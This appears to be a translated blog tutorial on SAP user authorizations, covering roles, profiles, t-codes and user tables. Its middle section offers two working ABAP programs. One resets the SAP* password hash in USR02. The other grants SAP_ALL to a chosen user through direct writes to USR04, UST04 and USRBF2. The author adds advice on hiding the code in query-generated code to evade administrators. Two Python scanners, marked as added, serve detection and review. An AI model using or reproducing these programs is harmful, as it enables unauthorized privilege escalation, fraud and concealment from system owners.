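Anatomy of user authorizations:
Basis usually uses PFCG for authorization management. When you save, the system generates a profile name.
Remember that in SU01 a user has two fields, profile and role? How are they related?
First, understand a few concepts.
1.activity
Put it this way: let's start with activity. What does activity mean? Look it up in the
dictionary and you will know. Right, it defines which actions may be performed, for example no smoking, only drinking, and no more than two.
No wait, that is what my wife says. SAP is not like that; it is things like only insert, update, display.
Back in the day the Germans wrote these into table TOBJ.
Activities can also be divided into activity groups.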
2.activity category &Authorization group
Role Vs Profile
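Look at table T020 and you will know; it is things like K, D, A, M.
What is a profile? It can be understood as the name of a collection of all the authorization data (made up of many authorization groups -- {you can fill these in with OBA7;
overly fine-grained authorizations are not a good thing either ^_^} and activities). Usually one custom role generates
one profile. SAP authorization control is driven by the authorization data (objects) in the profile.
And what is a role? A role is just a name, to which the profile is then assigned. For example, if you create a
user in SU01 and I give it no role at all but add the SAP_All profile,
it can still do anything.
SAP itself ships many default roles & profiles.
3. The most commonly used: PFCG->authorizations->change authorization data->
Once inside, choose selection criteria to see all the authorization objects.
Manually lets you add an authorization object by hand. For example, if a t-code fails with an authorization error, the ABAP developer uses SU53 to see
which authorization object is missing, and it can then be added by hand.
Choose authorization levels and you can subdivide authorizations further by account type.
Some go right down to table fields. You can even assign a buffer to an object.
So how does SAP actually enforce authorizations? The Butcher will carve it up a little.
4. Some t-codes related to authorizations.
(1) Role-related T-codes: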
PFAC Standard
PFAC_CHG Change
PFAC_DEL Delete
PFAC_DIS Display
PFAC_INS Create new
PFAC_STR
PFCG Create
ROLE_CMP Compare
SUPC Mass-create role profiles
SWUJ Test
SU03 Check authorization data
SU25, SU26 Check updated profile
(2) T-codes for creating users:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, SU51, SU52
SU1
SU10 Mass
SU12 Mass
SUCOMP: Maintain user company address
SU2 Change user parameters
SUIM User information system
User groups
SUGR: Maintain
SUGRD: Display
SUGRD_NAV: Also maintain
SUGR_NAV: Also display
(3) About profile & Authorization Data
SU02: Create a profile directly, without a role
SU20: Subdivide Authorization Fields
SU21(SU03):**** Maintain Authorization Objects (TOBJ, USR12).
For accounting documents you can subdivide down to:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
You can then go in and subdivide further. These things are saved in table USR12; at the DB layer it is UTAB.
Subdividing for a specific transaction code:
SU22,SU24
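SU53:*** This is what you use after an error to check which authorization objects are missing.
SU56: Analyze authorization data buffers.
SU87: Check the history produced by user changes
SU96,SU97,SU98,SU99: What are these for?
SUPC: Mass-generate roles
DB and logical layer: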
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All available authorization objects. (all are here)
USR12: User-level authorization values
-----------------------------
USR01: Master data
USR02: Passwords are here
USR04: Authorizations are here
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41: Current users
USREFUS:
USRBF2
USRBF3
UST04: User profiles are here
UST10C: Composite profiles
UST10S: Single profiles (corresponding to roles)
UST12 : Authorizations
..............................
How to steal authorizations
..............................
Users:
User type (what they are for is not covered here):
The usual user types are
a.dialog (i.e. the normal user)
b.communication
c.system
d.service
e.reference.
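Normally there is always an authorization check before you can use any T-code.
AUTHORITY_CHECK: this function only does a small check of whether your user exists and when it expires.
** For coding, using this function is enough.
AUTHORITY_CHECK_TCODE: checks the T-code
These two functions are the ones that really check authorization objects.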
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
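A program that changes the SAP* password to 123; very simple.
We find the user logon table USR02.
(DF52478E6FF90EEB is the value stored in the DB after SAP's encryption. Has anyone studied SAP's password encryption?)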
report zmodSAP*.
data zUSR02 like USR02 .
select single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02 .
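The problem now is how to keep your basis from noticing. Very simple: hide the code inside a Query. That is, you build a
query; a query generates code, and then you add this code to it. Who would think of it??? Then you just wait for your basis to cry...
Doing this is too vicious; better to quietly work on your own user instead.
For this you must understand the authorization structure very clearly.
Authorizations involve three tables: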
a.USR04
b.USR04
c.USRBF2 This table corresponds to the authorization objects used.
*&---------------------------------------------------------------------*
*& Report : Steal SAP ALL Right *
*& Creation Date : 2004.04.01 *
*& Created by : Stone.Fu *
*& Description : Steal only the SAP ALL authorization *
*& Modified Date : 2005.11.02
*& Description : Hide this code in report painter or query code *
*&---------------------------------------------------------------------*
report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All authorization
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS = zPROFS.
Update USR04 from zUSR04 .
**Update User authorization masters table UST04 .
select single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE = 'SAP_ALL'. "SAP all authorization
Update UST04 from zUST04 .
*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
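Both programs on this page change user master tables with plain Open SQL instead of going through SU01 or PFCG, so one review control is to search custom and query-generated source for such writes. The scanner below is an added example, not part of the original post: the table list is taken from this page, the sample source is constructed, and chained statements (`UPDATE: ...`) are assumed not to occur.

```python
import re

# User master tables listed on this page; writes to them should only come from
# SAP's own user maintenance, never from custom or query-generated code.
PROTECTED = {"USR02", "USR04", "UST04", "USRBF2", "USR10", "USR12",
             "UST10S", "UST10C", "UST12"}
# Open SQL write statements and the position of the table name in each.
WRITE_RE = re.compile(
    r"^\s*(?:(UPDATE|MODIFY)\s+(\w+)"
    r"|(INSERT)\s+(?:INTO\s+)?(\w+)"
    r"|(DELETE)\s+(?:FROM\s+)?(\w+))\b", re.IGNORECASE)

def scan_abap(source):
    """Return (start_line, verb, table) for each write to a protected table."""
    findings, buf, start = [], "", None
    for no, line in enumerate(source.splitlines(), 1):
        if line.startswith("*"):               # full-line ABAP comment
            continue
        line = re.sub(r"'[^']*'", "''", line)  # blank literals (may hold . or ")
        line = line.split('"', 1)[0]           # cut inline comment
        for part in re.split(r"(\.)", line):
            if part == ".":                    # end of one ABAP statement
                m = WRITE_RE.match(buf)
                if m:
                    verb, table = [g for g in m.groups() if g]
                    if table.upper() in PROTECTED:
                        findings.append((start, verb.upper(), table.upper()))
                buf, start = "", None
            elif part.strip():
                if start is None:
                    start = no                 # first line of the statement
                buf += " " + part
    return findings

# Constructed sample source (not from a real system).
SAMPLE = """\
* UPDATE usr02 in a comment must be ignored.
REPORT zdemo_query.
DATA ls_u TYPE usr02. "inline comment. with period
SELECT SINGLE * INTO ls_u FROM usr02 WHERE bname = 'A.B'.
update usr02
  from ls_u.
MODIFY lt_buf INDEX sy-tabix TRANSPORTING bname.
INSERT usrbf2 FROM TABLE lt_buf ACCEPTING DUPLICATE KEYS.
DELETE FROM zlocal_log WHERE uname = sy-uname.
"""

if __name__ == "__main__":
    print(scan_abap(SAMPLE))
```

Reads of these tables and writes to internal tables or unrelated Z tables are not reported; only the statement's first line number is kept for multi-line statements.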
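Create a ztest user yourself without giving it any authorizations, then run the report zrightsteal on the test machine.
Then ztest has SAP_ALL. Then you hide the code in the code of an SQP query; ABAP code is too easily discovered. OK, now I have run into a big problem: the posting program was modified and something went wrong...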
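A profile written straight into UST04, as the report above does, is not accounted for by any user-maintenance change record, which gives a defender something to reconcile. The following is an added example, not code from the original post: it assumes a UST04 export with the MANDT, BNAME and PROFILE fields used above and a change-history export in a hypothetical (timestamp, client, user, action, profile) layout, and all data in it is constructed.

```python
from collections import defaultdict

def expected_profiles(history):
    """Replay ASSIGN/REMOVE events in time order -> {(mandt, bname): {profiles}}."""
    state = defaultdict(set)
    for _ts, mandt, bname, action, profile in sorted(history):
        if action == "ASSIGN":
            state[(mandt, bname)].add(profile)
        elif action == "REMOVE":
            state[(mandt, bname)].discard(profile)
    return state

def reconcile(ust04_rows, history):
    """Compare the UST04 snapshot with what the change history explains."""
    expected = expected_profiles(history)
    actual = defaultdict(set)
    for row in ust04_rows:
        actual[(row["MANDT"], row["BNAME"])].add(row["PROFILE"])
    findings = []
    for key in sorted(set(actual) | set(expected)):
        for prof in sorted(actual[key] - expected[key]):
            findings.append((key[1], prof, "in UST04, not explained by history"))
        for prof in sorted(expected[key] - actual[key]):
            findings.append((key[1], prof, "logged, missing from UST04"))
    return findings

# Constructed data: hypothetical change-history export and UST04 snapshot.
HISTORY = [
    ("2024-03-01T09:00", "200", "ZBASIS1", "ASSIGN", "SAP_ALL"),
    ("2024-03-02T10:00", "200", "ZCLERK", "ASSIGN", "Z_FI_DISPLAY"),
    ("2024-03-05T08:00", "200", "ZCLERK", "ASSIGN", "SAP_ALL"),
    ("2024-03-05T18:00", "200", "ZCLERK", "REMOVE", "SAP_ALL"),
]
UST04 = [
    {"MANDT": "200", "BNAME": "ZBASIS1", "PROFILE": "SAP_ALL"},
    {"MANDT": "200", "BNAME": "ZCLERK", "PROFILE": "Z_FI_DISPLAY"},
    {"MANDT": "200", "BNAME": "ZCLERK", "PROFILE": "SAP_ALL"},
    {"MANDT": "200", "BNAME": "ZTEST", "PROFILE": "SAP_ALL"},
]

if __name__ == "__main__":
    for finding in reconcile(UST04, HISTORY):
        print(finding)
```

ZCLERK is reported because the logged removal was never reflected in the table, and ZTEST because no record explains its profile at all.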